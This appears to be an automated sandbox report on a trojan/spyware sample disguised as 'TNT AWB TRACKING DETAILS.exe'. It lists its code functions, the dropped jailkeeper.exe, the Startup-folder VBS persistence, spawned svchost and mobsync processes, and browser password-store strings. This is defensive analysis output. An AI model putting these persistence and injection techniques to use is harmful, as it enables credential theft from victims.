Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC1484	0_2_00AC1484
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB5520	0_2_00AB5520
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC7696	0_2_00AC7696
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB5760	0_2_00AB5760
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC1978	0_2_00AC1978
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AD9AB5	0_2_00AD9AB5
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00ACBDA6	0_2_00ACBDA6
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AC1D90	0_2_00AC1D90
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00B27DDB	0_2_00B27DDB
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AB3FE0	0_2_00AB3FE0
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_03963690	0_2_03963690
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0022E6A0	4_2_0022E6A0
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024D975	4_2_0024D975
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0022FCE0	4_2_0022FCE0
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002421C5	4_2_002421C5
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002562D2	4_2_002562D2
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002A03DA	4_2_002A03DA
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0025242E	4_2_0025242E
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002425FA	4_2_002425FA
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0027E616	4_2_0027E616
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002366E1	4_2_002366E1
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0025878F	4_2_0025878F
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00238808	4_2_00238808
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00256844	4_2_00256844
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002A0857	4_2_002A0857
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00288889	4_2_00288889
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024CB21	4_2_0024CB21
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00256DB6	4_2_00256DB6
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00236F9E	4_2_00236F9E
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00233030	4_2_00233030
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00243187	4_2_00243187
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024F1D9	4_2_0024F1D9
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00221287	4_2_00221287
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00241484	4_2_00241484
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00235520	4_2_00235520
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00247696	4_2_00247696
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00235760	4_2_00235760
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00241978	4_2_00241978
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00259AB5	4_2_00259AB5
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0024BDA6	4_2_0024BDA6
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00241D90	4_2_00241D90
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002A7DDB	4_2_002A7DDB
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_0022DF00	4_2_0022DF00
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00233FE0	4_2_00233FE0
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_00D83690	4_2_00D83690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418583	5_2_00418583
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00410033	5_2_00410033
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E0B3	5_2_0040E0B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040290C	5_2_0040290C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402910	5_2_00402910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004011D0	5_2_004011D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00403240	5_2_00403240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040E28B	5_2_0040E28B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0042EC33	5_2_0042EC33
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00401CE0	5_2_00401CE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004045E4	5_2_004045E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040259B	5_2_0040259B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402D9D	5_2_00402D9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402DA0	5_2_00402DA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004025A0	5_2_004025A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00401E73	5_2_00401E73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040FE0A	5_2_0040FE0A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040FE13	5_2_0040FE13
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004167C3	5_2_004167C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004167BF	5_2_004167BF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A003E6	5_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394E3F0	5_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FA352	5_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C02C0	5_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0274	5_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A001AA	5_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F41A2	5_2_039F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F81CC	5_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DA118	5_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930100	5_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039C8158	5_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D2000	5_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393C7C0	5_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03964750	5_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940770	5_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395C6E0	5_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A00591	5_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940535	5_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EE4F6	5_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E4420	5_2_039E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F2446	5_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F6BD7	5_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FAB40	5_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393EA80	5_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A0A9A6	5_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039429A0	5_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03956962	5_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039268B8	5_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0396E8F0	5_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394A840	5_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03942840	5_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039BEFA0	5_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03932FC8	5_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394CFE0	5_2_0394CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03960F30	5_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E2F30	5_2_039E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03982F28	5_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B4F40	5_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03952E90	5_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FCE93	5_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FEEDB	5_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0393AE0D	5_2_0393AE0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FEE26	5_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940E59	5_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03958DBF	5_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DCD1F	5_2_039DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394AD00	5_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E0CB5	5_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03930CF2	5_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03940C00	5_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0398739A	5_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F132D	5_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392D34C	5_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039452A0	5_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395B2C0	5_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E12ED	5_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0394B1B0	5_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A0B16B	5_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0392F172	5_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0397516C	5_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EF0CC	5_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039470C0	5_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F70E9	5_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FF0E0	5_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FF7B0	5_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F16CC	5_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03985630	5_2_03985630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DD5B0	5_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03A095C3	5_2_03A095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F7571	5_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FF43F	5_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03931460	5_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395FB80	5_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B5BF0	5_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0397DBF9	5_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FFB76	5_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039DDAAC	5_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03985AA0	5_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039E1AA3	5_2_039E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039EDAC6	5_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FFA49	5_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F7A46	5_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B3A6C	5_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039D5910	5_2_039D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03949950	5_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395B950	5_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039438E0	5_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039AD800	5_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03941F92	5_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FFFB1	5_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03903FD2	5_2_03903FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03903FD5	5_2_03903FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FFF09	5_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03949EB0	5_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0395FDC0	5_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F1D5A	5_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_03943D40	5_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039F7D73	5_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039FFCF2	5_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_039B9C32	5_2_039B9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0392B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03975130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 039AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03987E54 appears 111 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: String function: 00AC0AE3 appears 70 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: String function: 00AA7DE1 appears 36 times
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: String function: 00AC8900 appears 42 times
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: String function: 00240AE3 appears 70 times
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: String function: 00248900 appears 42 times
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: String function: 00227DE1 appears 35 times

Source: TNT AWB TRACKING DETAILS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@14/11@4/2

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B0A06A GetLastError,FormatMessageW,

0_2_00B0A06A

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AF81CB AdjustTokenPrivileges,CloseHandle,	0_2_00AF81CB
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Code function: 0_2_00AF87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	0_2_00AF87E1
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002781CB AdjustTokenPrivileges,CloseHandle,	4_2_002781CB
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Code function: 4_2_002787E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,	4_2_002787E1

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B0B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00B0B3FB

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B1EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00B1EE0D

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00B183BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00B183BB

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Code function: 0_2_00AA4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00AA4E89

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\hurtling

Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

File created: C:\Users\user\AppData\Local\Temp\autDCC5.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"

Source: TNT AWB TRACKING DETAILS.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mobsync.exe, 0000000F.00000003.2990236923.0000000000453000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3437719389.00000000004A2000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2992701293.0000000000480000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000002.3437719389.0000000000474000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 0000000F.00000003.2990360665.0000000000474000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TNT AWB TRACKING DETAILS.exe	Virustotal: Detection: 39%
Source: TNT AWB TRACKING DETAILS.exe	ReversingLabs: Detection: 52%

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

File read: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jailkeeper.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\hurtling\jailkeeper.exe"	Jump to behavior
Source: C:\Program Files (x86)\uCphyCkGBxvzixxLAPgYEKOTkDcTCuepEmygImoDRsvTTOrN\RXSytTjWIT.exe	Process created: C:\Windows\SysWOW64\mobsync.exe "C:\Windows\SysWOW64\mobsync.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\mobsync.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\hurtling\jailkeeper.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
